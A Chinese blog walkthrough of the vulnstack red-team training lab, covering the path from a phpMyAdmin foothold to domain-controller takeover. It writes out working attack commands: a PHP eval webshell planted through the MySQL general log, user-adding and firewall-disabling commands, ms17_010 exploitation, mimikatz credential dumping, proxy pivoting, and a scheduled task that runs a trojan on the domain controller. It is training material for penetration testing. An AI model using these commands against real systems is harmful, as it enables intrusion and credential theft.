ATT&CK红队评估实战靶场(一)

写在前面的话

第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩)

靶场地址:vulunstack

靶场搭建

ATT&CK红队评估实战靶场(一)


Win7:密码: cys121`
外网192.168.47.132
内网 192.168.52.143

ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)


Win2008 密码:cys121`
内网 192.168.52.138

ATT&CK红队评估实战靶场(一)


Win2003 密码:cys121`
内网 192.168.52.141

ATT&CK红队评估实战靶场(一)

经过互相ping 内网三台机器可以互相ping通


Kali
外网 192.168.47.129

ATT&CK红队评估实战靶场(一)


Kali(攻击机):外网 192.168.47.129
Win7(VM1):外网192.168.47.132 内网 192.168.52.143
Win2003(VM2) 域成员 192.168.52.141
Win2008(VM3) 域控 192.168.52.138

启动win7 phpstudy:

ATT&CK红队评估实战靶场(一)


信息搜集

访问win7 php网站服务:

ATT&CK红队评估实战靶场(一)
看到是php探针

Nmap 扫描开启了哪些端口:开启80端口

ATT&CK红队评估实战靶场(一)
御剑扫描:发现phpmyadmin

ATT&CK红队评估实战靶场(一)

dirsearch 也扫到一些

这里我没有扫到/yxcms/

ATT&CK红队评估实战靶场(一)
这里可以利用网页的漏洞登录进后台进行文件编辑写入一句话getshell,这里就不说了


漏洞利用getshell

后台Getshell

进入/phpmyadmin

默认账号密码登陆成功:root root

ATT&CK红队评估实战靶场(一)
尝试一下用 into outfile执行写入一句话getshell失败:

select "<?php eval($_POST[shell]);?>" into out file '/tmp/cyshack.php'

ATT&CK红队评估实战靶场(一)
原因是写入功能未开启

尝试开启全局日志利用getshell

 show variables like '%general%';

ATT&CK红队评估实战靶场(一)

可以看到功能是关闭的且回显日志文件的路径

尝试开启并更改路径

 set global general_log='on'
 set global general_log_file='C:/phpStudy/www/cyshack.php' 

ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
写入一句话:

 select "<?php eval($_POST[shell]);?>"

ATT&CK红队评估实战靶场(一)
蚁剑链接:

ATT&CK红队评估实战靶场(一)
成功getshell:

ATT&CK红队评估实战靶场(一)


蚁剑利用

蚁剑查询身份:

ATT&CK红队评估实战靶场(一)


添加用户:

 net user cys hongrisec@2020 /add

(增加一个名为cys 密码为hongrisec@2020的用户名)

ATT&CK红队评估实战靶场(一)
查看cys用户:

ATT&CK红队评估实战靶场(一)


关闭防火墙:

 netsh advfirewall set allprofiles state off

ATT&CK红队评估实战靶场(一)


控制win7

获取权限

有两种方法:

  木马反弹shell
  SMB ms17_010

Msvemon生成木马

ATT&CK红队评估实战靶场(一)
蚁剑上传木马

ATT&CK红队评估实战靶场(一)
运行木马:

ATT&CK红队评估实战靶场(一)
在kali设置监听即可

尝试ms17_010:

ATT&CK红队评估实战靶场(一)
攻击 拿下win7权限:

ATT&CK红队评估实战靶场(一)


提升权限

 Sysinfo
 Getuid  (发现是administor权限)
 Getsystem (获取system权限)

msf的getsystem命令原理

ATT&CK红队评估实战靶场(一)


主机密码收集

Hashdump:看到用户的密码哈希值

ATT&CK红队评估实战靶场(一)

Mimikatz:抓取明文密码
ps:mimikatz模块已经合并为kiwi模块

Metasploit-进阶用户密码与mimikatz模块kiwi模块

load_kiwi:

ATT&CK红队评估实战靶场(一)
creds_all 命令直接获取密码:

ATT&CK红队评估实战靶场(一)


远程桌面连接

Nmap未开启3389

ATT&CK红队评估实战靶场(一)
meterpreter尝试开启3389:

 run post/windows/manage/enable_rdp

ATT&CK红队评估实战靶场(一)
尝试远程登录:

 rdesktop -g 1440x900 -r disk:LinuxxDisk=/root/Downloads -u STU1 -p "密码" 192.168.47.132

ATT&CK红队评估实战靶场(一)


内网搜集

ipconfig看到另外一个ip:

ATT&CK红队评估实战靶场(一)
应该是内网网段

使用 ipconfig /all 查看 DNS 服务器:
发现 DNS 服务器名为 god.org

查看域信息:net view

查看主域信息:net view /domain

网上很多搜集手段,不在说了


添加路由,挂socks4a代理

横向渗透前,先将该web服务器配置为代理服务器当作跳板机。

添加路由

查看路由信息,添加路由到目标环境网络

目的是为了使得MSF能够通过Win7路由转发访问,使得msf命令能够通过win7 访问到 内网

Run get_local_subnets   //可以用此命令查看目标机器所在内网网端信息与公网网端信息。

添加内网路由 使得msf6能通过win7路由转发访问内网192.168.52.0/24网段

 run autoroute -s 192.168.52.0/24

ATT&CK红队评估实战靶场(一)

这样,我们就可以通过msf 进入.52网段

马上扫描52网段:

run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24

ATT&CK红队评估实战靶场(一)

扫描存活主机:

 use auxiliary/scanner/netbios/nbname

ATT&CK红队评估实战靶场(一)

内网端口信息:

use auxiliary/scanner/portscan/tcp

ATT&CK红队评估实战靶场(一)


挂socks4a代理

挂代理是为了让其他工具能够通过win7 ,去访问192.168.52.0/24 网段

配置msf代理:

 use auxiliary/server/socks_proxy

ATT&CK红队评估实战靶场(一)

ATT&CK红队评估实战靶场(一)
run之后会出现 starting...jobs可以查看当前代理任务,如果出现stoping...,可以尝试更改 SRVHOST配置 或者 修改如下配置文件

如果proxychains配置终端代理出现问题 修改一下文件

切记打开的是/etc/proxychains4.config

ATT&CK红队评估实战靶场(一)

设置代理成功后 使用其他工具时需要添加proxychains:

Nmap扫描 192.168.52.141

proxychains nmap -Pn -sT 192.168.52.141  // -Pn -sT 不可少

ATT&CK红队评估实战靶场(一)


渗透win2003(远程登录)

信息收集

扫描主机版本

use auxiliary/scanner/smb/smb_version 

扫描192.168.52.141系统版本信息 是win2003

ATT&CK红队评估实战靶场(一)
nmap 扫描端口等


尝试攻击

由nmap看到开放445端口
尝试永恒之蓝攻击win2003

 use exploit/windows/smb/ms17_010_psexec   //windows 2003 的攻击模块
 set payload windows/meterpreter/bind_tcp

ATT&CK红队评估实战靶场(一)
可以看到能获取权限但是win7直接断开连接

再次尝试:

ATT&CK红队评估实战靶场(一)
依旧是:(经常性断掉win7 控制权,导致断一次我就要重新打一次)

ATT&CK红队评估实战靶场(一)
我去!!!终于知道哪里错了

得到win7权限之后 一定要首先看一下自己的权限

Getuid
Getsystem
run post/windows/manage/enable_rdp(关闭防火墙)

ATT&CK红队评估实战靶场(一)

再打一次:成了但是其他命令无法执行

ATT&CK红队评估实战靶场(一)
尝试ms08-067没打下来

可以执行一些系统权限的命令,添加管理员用户尝试3389登录

use auxiliary/admin/smb/ms17_010_command 

因为开了445端口:

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user cyshack @cys121@ /add  #添加用户
run  #成功执行
set command net localgroup administrators cyshack /add  #管理员权限
run  #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  //开启3389端口
run #成功执行

系统权限命令:

ATT&CK红队评估实战靶场(一)

cyshack用户:

ATT&CK红队评估实战靶场(一)

3389:

ATT&CK红队评估实战靶场(一)
然后使用proxychains连接他的3389(cyshack用户登录)

 Proxychains rdesktop 192.168.52.141 

ATT&CK红队评估实战靶场(一)

ATT&CK红队评估实战靶场(一)


走向win2008(C盘共享传马)

msf攻击win2008实例

信息收集

扫描版本信息:

use auxiliary/scanner/smb/smb_version

ATT&CK红队评估实战靶场(一)
Nmap:开启了135 和445 , 3389未开启

ATT&CK红队评估实战靶场(一)

ATT&CK红队评估实战靶场(一)
永恒之蓝和135端口漏洞都失败 放弃漏洞

ATT&CK红队评估实战靶场(一)
使用命令:可添加用户

use auxiliary/admin/smb/ms17_010_command

ATT&CK红队评估实战靶场(一)


另辟蹊径

win7中得到域内用户密码:

 kiwi_cmd sekurlsa::logonpasswords

ATT&CK红队评估实战靶场(一)
这里利用 win7 向域控传一个msf马,并让域控中的马定时开启然后我们只需要在kali设置监听即可

生成马:(设置反弹shell到win7的9999端口)

ATT&CK红队评估实战靶场(一)
先win7连接域控的c盘共享

 (shell) net use \\192.168.52.138\c$ "cys121`" /user:"administrator"

查看域控的c盘资源:

(shell) dir \\192.168.52.138\c$

ATT&CK红队评估实战靶场(一)
说明成功

上传msf马到win7:

(win7 meterpreter) upload

ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
将win7的马共享给域控:

(shell) copy c:\Windows\System32\cyshoumen.exe \\192.168.52.138\c$

ATT&CK红队评估实战靶场(一)
看到域控:

ATT&CK红队评估实战靶场(一)
设置一个任务计划,定时启动木马:

schtasks /create /tn "test" /tr C:\cyshoumen.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "cys121`"

ATT&CK红队评估实战靶场(一)
设置监听:此时应该监听win7的9999端口

到时间点之后会反弹shell:

ATT&CK红队评估实战靶场(一)
拿下


参考

好文章1
好文章2
好文章3

上一篇:2021-04-25


下一篇:红日安全ATT&CK靶机实战系列之vulnstack7